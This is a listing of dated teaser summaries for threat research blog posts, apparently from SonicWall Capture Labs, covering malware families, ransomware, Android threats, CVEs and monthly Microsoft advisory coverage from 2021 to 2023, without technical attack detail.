Recently, the SonicWall Capture Labs Research team analyzed a ransomware called Money Message. Written in C++, this ransomware encrypts the victim’s files without changing the filename or appending an extension, making it more difficult to […]
Posted: April 17, 2023
SonicWall Capture Labs threat research team has come across a new C++-based variant of Laplas Clipper, which targets cryptocurrency users. Laplas Clipper has been observed in the past with .NET and Go language variants. In this variant, the malware employs various anti-debug, anti-sandbox and anti-analysis techniques to evade detection.
Posted: April 12, 2023
The malware comes as a ZIP bundle posing as the legitimate software Advanced Port Scanner, which contains multiple components related to the software, including a malicious DLL.
Posted: April 11, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of April 2023.
Posted: April 7, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: GitLab is a web-based platform for software development and collaboration, offering a comprehensive suite of tools for version control, continuous integration, and continuous […]
Posted: March 31, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Public Key Infrastructure (PKI) is a comprehensive framework for managing digital certificates and cryptographic keys, serving as the foundation for secure communication over […]
Posted: March 31, 2023
The 3CX application is delivered on the victim’s machine along with the compromised DLLs “ffmpeg.dll” and “d3dcompiler_47.dll”.
Posted: March 28, 2023
The latest AsyncRAT variant has advanced its capabilities by adding support for additional commands from the C2, a clipper module, a cryptostealer module, a keylogger module and the ability to prevent the system from going to sleep.
Posted: March 24, 2023
TerraMaster NAS devices running TOS version 4.2.29 suffer from a vulnerability which allows remote unauthenticated attackers to execute commands as root.
Posted: March 23, 2023
The SonicWall Capture Labs threat research team has once again observed a surge in Emotet. This notorious malware, which heavily targets large organizations, uses tactics and functionality similar to those observed in past variants. Originally a […]
Posted: March 22, 2023
The Snake keylogger final payload is wrapped in multiple layers of protection to prevent its detection and analysis.
Posted: March 15, 2023
What is CVE-2023-23397: CVE-2023-23397 is a Microsoft Outlook Elevation of Privilege vulnerability. It allows an NTLM relay attack against another service to authenticate as the user. SonicWall provides protection against exploits targeting this vulnerability. […]
Posted: March 14, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of March 2023.
Posted: March 14, 2023
SonicWall RTDMI has been detecting a surge of VBScript files over the last few weeks which download and execute GuLoader shellcode on the victim’s machine.
Posted: March 10, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: phpIPAM is a free and open-source web-based IP address management (IPAM) software application. It is designed to help organizations efficiently manage their IP […]
Posted: March 8, 2023
The SonicWall Capture Labs Threat Research team came across a malware campaign that steals device information, card information and Google Authenticator codes on Android devices. This malware uses famous Android app icons to mislead users and trick victims into installing the malicious app on their device.
Posted: March 7, 2023
SonicWall RTDMI detected a malicious OneNote file that is not detected by any security provider on popular threat intelligence sharing portals such as VirusTotal and ReversingLabs.
Posted: March 3, 2023
This week, the Sonicwall Capture Labs Research team analyzed a Trojan downloader targeting Linux environments. This Trojan has been around since 2019, but has not been active in the past year until recently. It uses […]
Posted: March 3, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Froxlor is a web-based server management panel that allows users to easily manage multiple web hosting accounts on a single server. It is […]
Posted: February 24, 2023
A command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device.
Posted: February 21, 2023
Vohuk ransomware uses the genuine Windows tool Cipher.exe to overwrite deleted files, which makes recovery of the files impossible.
Posted: February 14, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of February 2023.
Posted: February 14, 2023
SonicWall RTDMI is detecting a spike in malicious OneNote files being delivered to victims’ machines as email attachments.
Posted: February 10, 2023
LockBit 3.0, also known as LockBit Black, is a ransomware family that operates under the Ransomware-as-a-Service (RaaS) model, where the creators collaborate with affiliates who may not have the resources to create and deploy attacks. […]
Posted: February 10, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: KSMBD stands for Kernel-based SMB Direct. It’s a Linux kernel module that provides the implementation of the SMBv3 protocol, allowing the Linux kernel […]
Posted: February 3, 2023
This week, the Sonicwall Capture Labs Research team analyzed a sample of Berbew, a trojan that has been seen used in connection with Download.Ject and FormBook to steal user passwords for banking and other financial […]
Posted: February 3, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: ManageEngine is a subsidiary of Zoho Corporation that provides IT management software for businesses. The company offers a range of products for network, […]
Posted: January 27, 2023
This week, the Sonicwall Capture Labs Research team analyzed a ransomware called Magniber. This ransomware has been around since 2017 as a successor to Cerber and initially only targeted a specific country when we first […]
Posted: January 27, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Adobe ColdFusion is an application development platform by Adobe Systems. It is an IDE used to develop web applications and supports a full […]
Posted: January 20, 2023
Control Web Panel 7 versions prior to 0.9.8.1147 suffer from an unauthenticated remote code execution vulnerability.
Posted: January 13, 2023
The SonicWall Capture Labs threat research team has been tracking a well-established ransomware family known as GPcode. GPcode ransomware is typically spread through email attachments or social engineering techniques, such as disguising the malware as a […]
Posted: January 10, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of January 2023.
Posted: January 6, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: daloRADIUS is an advanced RADIUS web management application aimed at managing hotspots and general-purpose ISP deployments. It features user management, graphical reporting, accounting, […]
Posted: December 22, 2022
A command injection vulnerability exists in TOTOLink A3000RU routers which could allow attackers to execute arbitrary commands.
Posted: December 22, 2022
This week, the SonicWall Capture Labs Threat Research Team analyzed a new sample of Raspberry Robin. First observed in May 2022 by Red Canary, Raspberry Robin is a worm that has evolved to be a […]
Posted: December 16, 2022
This week, the Sonicwall Capture Labs Research team analyzed a ransomware called Cryptonite. It is an open-sourced ransomware that was once available on GitHub but has now been taken down. It exhibited behavior consistent of […]
Posted: December 13, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of December 2022.
Posted: December 9, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Centreon is a network, system and application monitoring tool. Centreon is the only AIOps Platform Providing Holistic Visibility to Complex IT Workflows from […]
Posted: December 2, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Apache Airflow is an open-source workflow management platform. Apache Airflow is a flexible, scalable workflow automation and scheduling system for authoring and managing […]
Posted: November 23, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Delta Electronics InfraSuite Device Master is a tool for centralized monitoring and control of a large number of devices. Users create a human-machine […]
Posted: November 18, 2022
The Tenda AC1200 router does not perform proper validation of user-supplied input and is vulnerable to cross-site scripting attacks.
Posted: November 11, 2022
The SonicWall Capture Labs threat research team has recently been tracking a ransomware family called Black Basta. Black Basta first appeared in April 2022 and is believed to be operated by a well organized cybercrime […]
Posted: November 9, 2022
Introduction: After several months of hiatus, Emotet is back. SonicWall Capture Labs threat research team has observed, starting last week, that the notorious malware, which heavily targets large organizations, has returned with similar tactics and […]
Posted: November 8, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2022.
Posted: November 3, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: The OpenSSL Project develops and maintains the OpenSSL software, a robust, commercial-grade, full-featured toolkit for general-purpose cryptography and secure communication. OpenSSL contains an […]
Posted: November 2, 2022
Malware authors have been extensively using C# to build malware for the last few years, due to its simplicity and rich Application Programming Interfaces (APIs). RedLine is an advanced info stealer written in C#, active in the wild since 2020.
Posted: October 28, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: KeySight N6854A Geolocation server software and the N6841A RF Sensor software provide an easy way to configure all of the RF Sensors in […]
Posted: October 20, 2022
An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole that can lead to incorrect access to any other user accounts.
Posted: October 14, 2022
The SonicWall Capture Labs Research team came across malware which purports to be a picture but is intended to wipe the hard drive, deleting data and programs. It is a multicomponent infection […]
Posted: October 11, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of October 2022.
Posted: October 7, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Schneider Electric’s Interactive Graphical Supervisory Control and Data Acquisition (SCADA) System (IGSS) is used for monitoring and controlling industrial processes. According to the […]
Posted: September 30, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: mySCADA professional tools are for developing and managing HMI (Human-Machine Interface)/SCADA (Supervisory Control and Data Acquisition) industrial processes. myPRO is one tool in […]
Posted: September 30, 2022
Recently we have seen multiple droppers dropping infostealers or banking trojans along with ransomware. A few weeks ago our researchers at SonicWall Labs observed a clipbanker, i.e. a clipboard hijacker, being dropped by djvu (STOP) ransomware. Behaviour: The […]
Posted: September 30, 2022
Recent Microsoft Exchange Server zero day vulnerabilities are being exploited in the wild.
Posted: September 29, 2022
SonicWall Capture Labs Threat Research team has observed a PDF file, arriving as an e-mail attachment, being detected by SonicWall Real Time Deep Memory Inspection (RTDMI). The PDF file contains a link which downloads […]
Posted: September 23, 2022
Wavlink WN533A8 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the login_page parameter.
Posted: September 22, 2022
SonicWall Capture Labs Threats Research team has been regularly sharing information about the malware threats targeting Android devices. SonicWall has tracked down some active trojan SMS applications. This Android SMS app purports to be a […]
Posted: September 13, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of September 2022.
Posted: September 9, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: AVideo is a powerful base platform for uploading, curating, organizing, indexing, and distributing audio and video content. The plugin design allows you to […]
Posted: September 2, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Zimbra Collaboration is a collection of tools designed for collaboration. Tools within the suite include an email server, a chat server, a file […]
Posted: August 26, 2022
Overview: TightVNC is a remote desktop software application. It lets you connect to another computer and display its live remote desktop or control the remote computer with your mouse and keyboard, just as you would […]
Posted: August 22, 2022
SonicWall threat research team has observed a JavaScript file inside an archive being delivered to the victim’s machine as an email attachment, which further downloads the Java-based Remote Access Trojan (RAT) STRRAT to the victim’s machine.
Posted: August 19, 2022
A directory traversal vulnerability exists in the web services of Cisco’s Adaptive Security Appliance software and Firepower Threat Defense software.
Posted: August 19, 2022
SonicWall Capture Labs Threat Research team has been observing Android adware that was available on the Google Play store; it has now been removed from the Play store but is still being distributed via third-party platforms. […]
Posted: August 16, 2022
A new type of remote access trojan (RAT) has been identified by several AV companies. Dubbed ‘WoodyRAT’ due to the debugging information string, it is a multi-featured payload with a list of capabilities. As with […]
Posted: August 9, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2022.
Posted: August 5, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Ivanti Avalanche is a mobile device management system. The Avalanche Certificate Manager Server (CMS) enables the use of EAP-TLS wireless security and distribution […]
Posted: August 5, 2022
WhatsApp is being abused to target Indian customers with fraudulent attacks.
Posted: July 29, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Apache Spark is a unified analytics engine for large-scale data processing. It provides high-level APIs in Java, Scala, Python and R, and an […]
Posted: July 22, 2022
The SonicWall Capture Labs threat research team has observed reports of the launch of a new ransomware family named Lilith. Lilith ransomware is written in C/C++ and targets 64-bit Windows machines. Encrypted files are marked with […]
Posted: July 22, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: MySQL is a popular open-source implementation of a relational database that supports the Structured Query Language (SQL) for querying and updating stored data. […]
Posted: July 21, 2022
A VBScript is used by the threat actor to deliver fileless AsyncRAT to the victim’s machine.
Posted: July 14, 2022
SonicWall Capture Labs Threat Research team has observed a malicious PDF file, arriving as an e-mail attachment and detected by the SonicWall RTDMI™ engine, which delivers the REMCOS RAT as the final payload.
Posted: July 13, 2022
SonicWall Capture Labs Threat Research team has observed many Android locker ransomware samples which ask victims to communicate using social media platforms. There is no assurance of getting the key even after paying the ransom amount, they […]
Posted: July 12, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2022.
Posted: July 8, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Advantech iView is a Simple Network Management Protocol-based element management software provided free-of-charge with intelligent FTTx, Optical Access, Media Conversion and eWorx Smart […]
Posted: July 1, 2022
An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
Posted: June 27, 2022
GuLoader is a fileless, shellcode-based malware which downloads other malware and executes it under legitimate processes.
Posted: June 24, 2022
SonicWall Capture Labs threat research team observed attacks exploiting an old vulnerability in Vacron NVR.
Posted: June 23, 2022
SonicWall Capture Labs Threats Research team has been regularly sharing information about malware, including spyware, targeting Android devices. SonicWall has tracked down a huge number of fake applications disguised as legitimate Google update applications. Fig […]
Posted: June 22, 2022
SonicWall Capture Labs Threats Research team has been regularly sharing information about malware threats targeting Android devices. Recently we have observed some fake fantasy league betting applications in the wild. Google Play store banned all […]
Posted: June 21, 2022
SonicWall threat research team has observed an HTA file inside an archive being delivered to the victim’s machine, which further downloads and executes Smoke Loader malware.
Posted: June 14, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2022.
Posted: June 10, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Atlassian Confluence is a collaboration platform that allows you to build a knowledge base for documentation, product requirements, create, collaborate, comment on pages, […]
Posted: June 10, 2022
The SonicWall Capture Labs threat research team analyzed the latest cryptomining and infostealing Trojan from a well-known malware group called TeamTNT. They are known to target vulnerable *nix systems and deploy a cryptominer and a […]
Posted: June 1, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: CVE-2022-30190, a.k.a. Follina, is a Microsoft Office zero-day vulnerability that allows applications like Microsoft Word to execute code (without macros) by calling MSDT (Microsoft Support […]
Posted: May 27, 2022
Overview: WordPress is an open source, PHP-based Content Management System (CMS) that offers several features such as multiple users, editing, custom formatting of text and an architecture which supports plugins to further extend its functionality. […]
Posted: May 27, 2022
The SonicWall Capture Labs threat research team has read reports of a set of malicious scripts, still live online at the time of writing, that install crypto mining software on Linux servers. There are 3 […]
Posted: May 24, 2022
LokiBot has been delivered to victims’ machines using a Windows Script File for the last few weeks.
Posted: May 20, 2022
On F5 BIG-IP, undisclosed requests may bypass iControl REST authentication, leading to remote command execution.
Posted: May 10, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2022.
Posted: May 6, 2022
Overview: The Parse platform provides SDKs for various environments (Android, iOS, PHP, .NET, …) as well as managed cloud data storage. When creating mobile apps a lot of the development time goes into managing and scaling […]
Posted: May 2, 2022
This week the SonicWall Capture Labs Research team came across a malicious document template which delivered a remote access Trojan to unsuspecting victims. It poses as a mental health survey which silently drops a […]
Posted: April 29, 2022
Overview: WSO2 offers a platform of middleware products for agile integration, application programming interface (API) management, identity and access management, and smart analytics. A directory traversal vulnerability has been reported in WSO2 API Manager. The […]
Posted: April 22, 2022
Overview: VMware’s Workspace ONE Access, VMware Identity Manager (vIDM), vRealize Lifecycle Manager, vRealize Automation, and VMware Cloud Foundation products contain a remote code execution vulnerability due to server-side template injection. A remote, unauthenticated attacker can […]
Posted: April 15, 2022
The SonicWall Capture Labs threat research team has observed reports of ransomware which, in the antivirus community, goes by the name TargetCompany. The malware surfaced in June 2021. The current variant that we have obtained is […]
Posted: April 12, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of April 2022.
Posted: April 8, 2022
D-Link DIR-806 device command injection attacks spotted in the wild.
Posted: April 1, 2022
Feature-rich spyware for Android.
Posted: April 1, 2022
Overview: A Spring MVC (Model-View-Controller) or Spring WebFlux (Parallel version of Spring MVC which supports non-blocking reactive streams) application running on JDK (Java Development Kit) 9+ may be vulnerable to Remote Code Execution (RCE) via […]
Posted: March 25, 2022
This week the Sonicwall Capture Labs Research team analyzed a ransomware sample that is rather unconventional. After encrypting the victim’s files, it does not demand payment but rather asks the victim to carry out certain […]
Posted: March 25, 2022
Overview: A denial-of-service vulnerability has been reported in the OpenSSL library. The vulnerability is due to insufficient validation in BN_mod_sqrt() function. A remote attacker could exploit the vulnerability by sending crafted packets to an OpenSSL […]
Posted: March 18, 2022
As the war between Russia and Ukraine rages on, the conflict has extended into the cyber domain. In mid-February, the Security Service of Ukraine reported that the country was the target of an ongoing “wave […]
Posted: March 18, 2022
A SQL injection vulnerability exists in the WP Statistics plugin for WordPress. The vulnerability is due to insufficient sanitization of the current_page_id and current_page_type parameters.
Posted: March 10, 2022
Contains the capability to accept and execute commands.
Posted: March 8, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of March 2022.
Posted: March 4, 2022
The conflict between Russia and Ukraine has quickly escalated from the ground into cyberspace. Last week, the SonicWall Capture Labs Research team analyzed the HermeticWiper malware attack that was targeting Ukraine in this […]
Posted: March 4, 2022
Overview: Samba is an open-source implementation of file, print, and other network services suite known as SMB/CIFS (Server Message Block/Common Internet File System). Samba implements several protocols and services including NetBIOS over TCP/IP (NBT), SMB, […]
Posted: February 25, 2022
Overview: The H2 console application allows a user to access a SQL database using a browser interface. H2 is an open source Java SQL database that includes the following technologies: JDBC (Java Database Connectivity) is […]
Posted: February 25, 2022
The SonicWall threat research team has recently observed a new variant of BitPyLock ransomware. This family of ransomware surfaced in early 2020. It encrypts files and also threatens extortion by claiming to have sent files […]
Posted: February 25, 2022
The SonicWall Capture Labs Threat Research team has analyzed a sample which is widely believed to be targeting Ukrainian organizations. The malware sample is digitally signed with a certificate issued under the company name ‘Hermetica Digital Ltd’. There […]
Posted: February 18, 2022
SonicWall Threats Research Team received reports of Android malware in the wild that was hosted on an active domain. This malware appears to be a Remote Access Trojan with a number of capabilities. […]
Posted: February 17, 2022
Arbitrary command execution in formSysCmd via the sysCmd parameter exists in this Realtek SDK. Successful exploitation of this vulnerability allows remote attackers to achieve arbitrary code execution on the device.
Posted: February 11, 2022
The SonicWall Capture Labs Threat Research team has come across a ransomware with a bizarre demand in exchange for decryption. This ransomware calls itself “Black Eye” but, instead of demanding cryptocurrency as payment, it […]
Posted: February 8, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of February 2022.
Posted: February 4, 2022
Overview: EmbedThis GoAhead is a popular compact web server intended and optimized for embedded devices. Despite its small size, the server supports HTTP/1.1, CGI handler among others. An unrestricted file upload vulnerability has been reported […]
Posted: February 4, 2022
The SonicWall threat research team has recently seen reports of ransomware called Argos 2.0. The ransomware works like most others, encrypting files and demanding payment in bitcoin for file recovery. However, reverse engineering the malware […]
Posted: January 28, 2022
Overview: MySQL is a popular open-source implementation of a relational database that supports the Structured Query Language (SQL) for querying and updating stored data. Communication with the database occurs using the MySQL protocol. As with […]
Posted: January 21, 2022
A malicious variant already observed in the wild.
Posted: January 19, 2022
Grafana is a multi-platform, open-source analytics and interactive visualization web application. It provides charts, graphs, and alerts for the web when connected to supported data sources. Directory Traversal Vulnerability: Grafana versions 8.0.0-beta1 through 8.3.0 are […]
Posted: January 14, 2022
The SonicWall Capture Labs threat research team has come across a Linux variant of a ransomware early this week. Avoslocker is another ransomware-as-a-service (RaaS) selling their ready-made ransomware to affiliates to carry out ransomware […]
Posted: January 11, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of January 2022.
Posted: January 7, 2022
Overview: GitLab is a web-based Git repository manager that includes additional features to handle all stages of the DevOps lifecycle including continuous integration and delivery, issue tracking, monitoring, and integration with many other applications. GitLab is […]
Posted: January 7, 2022
The SonicWall Capture Labs threat research team has come across data theft malware derived from the Mercurial password stealer family. This malware is open source and readily available on GitHub for “educational purposes only”. Because […]
Posted: December 31, 2021
Overview: Apache Log4j is a logging library for Java. Log4j is a simple and flexible logging framework. With Log4j it is possible to enable logging at runtime without modifying the application binary. Apache Log4j is […]
Posted: December 29, 2021
GitHub is a platform which is commonly used to host open-source projects, and many such projects are security focused. SonicWall Threats Research team recently identified an Android ransomware that was found to be hosted on GitHub […]
Posted: December 23, 2021
With Christmas weekend upon us and many still looking for the best last-minute deals, we have noticed that we are receiving an increasing amount of holiday-related spam emails. We have been monitoring the amount of […]
Posted: December 20, 2021
SonicWall Capture Labs threat research team observed attacks exploiting a vulnerability in Yealink devices.
Posted: December 17, 2021
The SonicWall Capture Labs threat research team has been tracking ransomware, known to some in the antivirus community as GarrantDecrypt. The current variant of this ransomware appeared in late November 2021. The malware is aimed […]
Posted: December 15, 2021
ISO files are being abused by threat actors to deliver the payload to the victim’s machine without being detected.
Posted: December 14, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of December 2021.
Posted: December 10, 2021
Overview: Apache Log4j is a Java-based logging utility that can be configured through a configuration file or through Java code. Apache Log4j provides many features, such as reliability, extensibility, multiple configuration support including xml/json/yaml, excellent […]
Posted: December 10, 2021
Overview: ManageEngine ServiceDesk is an IT help desk platform that provides functionality to manage various aspects of an IT environment such as changes, incidents and assets and also incorporates a standard ITIL framework. ManageEngine SupportCenter […]
Posted: December 9, 2021
Contains multiple features including the ability to communicate with the attackers via Telegram
Posted: December 7, 2021
SonicWall Capture Labs Threats Research team has been detecting an ongoing phishing campaign which abuses users by pretending to be a genuine software platform using its logo. Upon opening the PDF file, an image with instructions […]
Posted: December 3, 2021
Overview: Microsoft Exchange Server is an ASP.NET implementation of an email and calendaring server and is capable of handling most standard Internet protocols as well as numerous proprietary Microsoft protocols and formats. Microsoft Exchange Server […]
Posted: December 3, 2021
A number of WordPress websites have been infected with what appeared to be ransomware. The infected websites show a warning on their homepage saying the site has been encrypted and listing a bitcoin address on […]
Posted: December 2, 2021
SonicWall Capture Labs Threats Research team has been regularly sharing information about the malware threats targeting Android devices. SonicWall has tracked down a huge number of financial fraud applications. Since the start of the […]
Posted: November 19, 2021
This week the SonicWall Capture Labs Research team analyzed malware samples that appear to be targeting one of the popular cloud computing platforms, Alibaba Cloud (Aliyun). Alibaba Cloud might not be the first name that […]
Posted: November 18, 2021
A command injection vulnerability exists in the web server of some Hikvision products.
Posted: November 11, 2021
With the rise in popularity of and investment in cryptocurrency there has been a rise in crypto-related scams as well. SonicWall Threats Research team identified an Android crypto wallet stealing malicious Android application. […]
Posted: November 9, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2021.
Posted: November 5, 2021
Overview: The SolarWinds Orion Platform is the base platform used by numerous SolarWinds products such as Network Performance Monitor, Virtualization Manager, and Server Configuration Monitor. The platform is designed to seamlessly integrate all Orion-based products […]
Posted: November 5, 2021
The SonicWall Capture Labs threat research team has come across new ransomware known as Foxxy. This ransomware appeared in late October 2021 and the sample we have obtained appears to be a proof of concept […]
Posted: October 29, 2021
Overview: The Apache HTTP server is the most popular web server used on the Internet. The server is capable of being utilized with many different options and configurations. A wide variety of runtime loadable plug-in […]
Posted: October 29, 2021
A malicious PowerShell script steals and sends email addresses from Outlook contacts.
Posted: October 27, 2021
Contains a number of spyware functions
Posted: October 22, 2021
Even back in the day, cybercriminals have been masking malware within pictures, screensavers or games that can be downloaded for free. But now, since the Internet has grown immensely into a huge form of entertainment […]
Posted: October 21, 2021
SonicWall Capture Labs threat research team observed attacks exploiting a SQL injection vulnerability in the WordPress WooCommerce plugin.
Posted: October 12, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of October 2021.
Posted: October 8, 2021
Overview: VMware vCenter Server is a data centre management server application developed by VMware Inc. VMware vCenter Server is designed primarily for vSphere, VMware’s platform for building virtualized cloud infrastructures. As part of a broader […]
Posted: October 1, 2021
Overview: OpenLDAP is an open-source implementation of the Lightweight Directory Access Protocol (LDAP) service. On a default installation, the OpenLDAP server uses TCP port 389 for communication. The OpenLDAP server has a modular architecture where […]
Posted: October 1, 2021
The SonicWall Capture Labs threat research team has observed a continued increase in ransomware used in double extortion schemes. The operators of ransomware known as AtomSilo have recently infiltrated a Brazilian pharmaceutical company. The malware […]
Posted: September 23, 2021
SonicWall Capture Labs threat research team observed attacks exploiting a vulnerability in Buffalo routers.
Posted: September 14, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of September 2021.
Posted: September 10, 2021
Overview: Atlassian Confluence is a collaboration platform written in Java. Users can create content using spaces, pages, and blogs which other users can comment on and edit. It is written primarily in Java and runs […]
Posted: September 3, 2021
Lockbit ransomware has been around since 2019 but recently released an updated version called Lockbit 2.0. It is another ransomware-as-a-service (RaaS), which is a subscription-based model allowing partners to use a full-featured, already developed […]
Posted: September 3, 2021
Overview: Centreon is an open source IT monitoring solution. Centreon open source solution is the foundation for the Centreon EMS software suite which offers additional licensed modules. Centreon open source solution includes integration tools for […]
Posted: August 27, 2021
Overview: Nagios is an open source host, service and network monitoring program. The product’s functionality is implemented through a number of server-side programs primarily written in PHP with a backend database running MariaDB, a drop-in […]
Posted: August 19, 2021
An unauthenticated command injection vulnerability exists in ZeroShell. SonicWall Capture Labs threat research team observed attacks exploiting this vulnerability.
Posted: August 12, 2021
The SonicWall Capture Labs threat research team has recently been tracking malware that does more than encrypt files and demand a ransom. In the ransomware space there has been an increase in malware that also […]
Posted: August 10, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2021.
Posted: August 6, 2021
Overview: Advantech R-SeeNet is a monitoring application that runs on a server and its job is to collect information from the routers, store it, process it and present it to a network administrator. R-SeeNet consists […]
Posted: July 30, 2021
Overview: 3S Smart Software Solutions CoDeSys is an IEC 61131-compliant PLC program development environment for multiple programming languages. CoDeSys supports PLC devices from over 250 device manufacturers. The CoDeSys Gateway Server is a service which […]
Posted: July 21, 2021
Malware writers often use trending topics to masquerade their malicious creations. Ever since early 2020 the Covid-19 pandemic has given fuel to malware writers and scamsters to use Covid related themes to hide malicious applications. […]
Posted: July 19, 2021
A cross-site scripting (XSS) vulnerability exists in the web services interface of Cisco Adaptive Security Appliance (ASA) Software.
Posted: July 15, 2021
SonicWall Threats Research team has observed a highly obfuscated batch (BAT) file inside an archive which is downloaded to the victim’s machine. The BAT file executes a PowerShell script which downloads an archive file containing Metamorfo […]
Posted: July 13, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2021.
Posted: July 9, 2021
The recent Kaseya VSA server exploit incident has given an opportunity for cybercriminals to distribute fake Kaseya update programs. An unsuspecting user is tricked into downloading a program that appears to be from Kaseya but […]
Posted: July 9, 2021
Overview: Oracle Endeca Server is a hybrid search-analytical database. It organizes complex and varied data from disparate source systems into a flexible data model that reduces the need for upfront modeling. Oracle Endeca Server is […]
Posted: July 6, 2021
The SonicWall Capture Labs threat research team has analyzed the ransomware that is spreading using the exploitation of the Kaseya standalone on-premises VSA server and the subsequent supply-chain attacks. The attack starts with exploitation of […]
Posted: July 2, 2021
Overview: A new remote code execution (RCE) vulnerability has been discovered in the Microsoft Windows Print Spooler service. This vulnerability has been referred to publicly as PrintNightmare and assigned CVE-2021-34527. According to the vendor, this vulnerability […]
Posted: July 2, 2021
Overview: Oracle E-Business Suite is a collection of applications for Enterprise Resource Planning (ERP), Customer Relationship Management (CRM), and Supply Chain Management (SCM) and contains several product lines intended for specific use cases. The E-Business […]
Posted: July 1, 2021
The SonicWall Capture Labs threat research team has been tracking ransomware that encrypts and gives files a “.snoopdog” filename extension. The operator charges 1 BTC for file retrieval. However, as with most ransomware today, the […]
Posted: June 25, 2021
Overview: Advantech iView application enables network managers to configure, update, manage and monitor B+B SmartWorx solutions from a central location. It is a Simple Network Management Protocol-based element management software provided free-of-charge with all intelligent […]
Posted: June 18, 2021
With multiple obfuscation layers
Posted: June 17, 2021
A CRLF injection vulnerability exists in BF-430, BF-431, and BF-450M TCP IP Converter devices.
Posted: June 11, 2021
The SonicWall Capture Labs Research team has been observing a massive increase in ransomware attacks, with increasingly targeted attacks hitting mostly critical infrastructure. With companies willing to pay millions in ransom payments to restore operations, […]
Posted: June 8, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2021.
Posted: June 4, 2021
Overview: Multiple vulnerabilities have been discovered and reported in the VMware vSphere Client (HTML5), specifically in VMware vCenter Server vSAN Health Check plug-in product. Among these vulnerabilities, CVE-2021-21985 is a remote code execution vulnerability rated […]
Posted: June 4, 2021
Overview: Microsoft Visual Studio is an integrated development environment (IDE) from Microsoft. It can be used to develop console and graphical user interface (GUI) applications along with web sites, web applications, and web services. This […]
Posted: May 28, 2021
Overview: Netgear ProSAFE Network Management System NMS300 is a centralized and comprehensive management application for network administrators that enables them to discover, monitor, configure, and report on SNMP based enterprise-class network devices. The Netgear Network […]
Posted: May 27, 2021
The SonicWall Capture Labs threat research team has recently been tracking Conti ransomware. It has been reported that Conti has been connected with over 400 cyberattacks against organizations around the world. In addition to encrypting […]
Posted: May 21, 2021
F5 BIG-IP iControl REST interface has an unauthenticated remote command execution vulnerability.
Posted: May 21, 2021
Contains hardcoded targets
Posted: May 14, 2021
The SonicWall Capture Labs Threat Research team has analyzed a multi-stage infostealer. If available on the victim’s machine, this Trojan steals various cryptocurrency data, credit card info, FTP server info and credentials on Discord, Telegram, […]
Posted: May 11, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2021.
Posted: May 7, 2021
Overview: Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise. Apache OFBiz is a […]
Posted: April 30, 2021
Overview: Eaton’s Intelligent Power Manager (IPM) software provides the tools needed to monitor and manage power devices in your physical or virtual environment keeping devices up and running during a power or environmental event. This […]
Posted: April 30, 2021
